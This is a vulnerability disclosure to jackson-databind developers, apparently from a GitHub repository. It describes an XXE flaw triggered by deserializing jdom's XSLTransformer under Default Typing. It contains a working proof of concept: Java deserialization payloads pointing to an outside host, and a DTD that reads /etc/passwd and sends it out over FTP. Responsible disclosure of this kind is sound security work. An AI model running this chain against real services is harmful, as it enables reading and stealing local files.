-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathcve-2341-jdom2.txt
46 lines (37 loc) · 2 KB
/
cve-2341-jdom2.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Hi Developers:
I found jackson-databind is vulnerable to XXE when Default Typing is enabled and the service has the
jdom.jar in the classpath. An attacker is able to read arbitrary local file by XXE payload.
Details are as follows:
Description
org.jdom2.transform.XSLTransformer#XSLTransformer(java.lang.String)
accepts stylesheet system id which is a string parameter and may be a url of a xml file.
When an org.jdom2.transform.XSLTransformer Object is constructed, the xml file will be parsed and feature external-parameter-entities and external-general-entities is enabled by default, and this is the place where XXE attack occurs.
Poc
This is a typical exploit of XXE. Any thing about the exploit you can refer to this: https://blog.zsec.uk/out-of-band-xxe-2/
1. start a malicious ftp server to accept contents. The codes is available here: https://gist.github.com/staaldraad/280f167f5cb49a80b4a3
> python xxeftp.py
2. deserialize an org.jdom2.transform.XSLTransformer Object from json:
public static void main(String[] args){
//for jdom 2.X
String payload1="[\"org.jdom2.transform.XSLTransformer\",\"http://aliyun.nudtcat.org:84/ftp5.xml\"]";
//for jdom 1.X
String payload2="[\"org.jdom.transform.XSLTransformer\",\"http://aliyun.nudtcat.org:84/ftp5.xml\"]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
try {
mapper.readValue(payload1, Object.class);
} catch (
IOException e) {
e.printStackTrace();
}
}
The contents of http://aliyun.nudtcat.org:84/ftp5.xml are as follows:
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://aliyun.nudtcat.org:84/dtd.php">%asd;%c;]>
<cdl>&rrr;</cdl>
The contents of http://aliyun.nudtcat.org:84/dtd.php are as follows:
<?php
echo '<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM \'ftp://aliyun.nudtcat.org:2121/%d;\'>">';
The complete codes are attached.
Vulnerability Reporter
何彪(He Biao) from Non-Attack Security Lab of Ant Financial Services Group.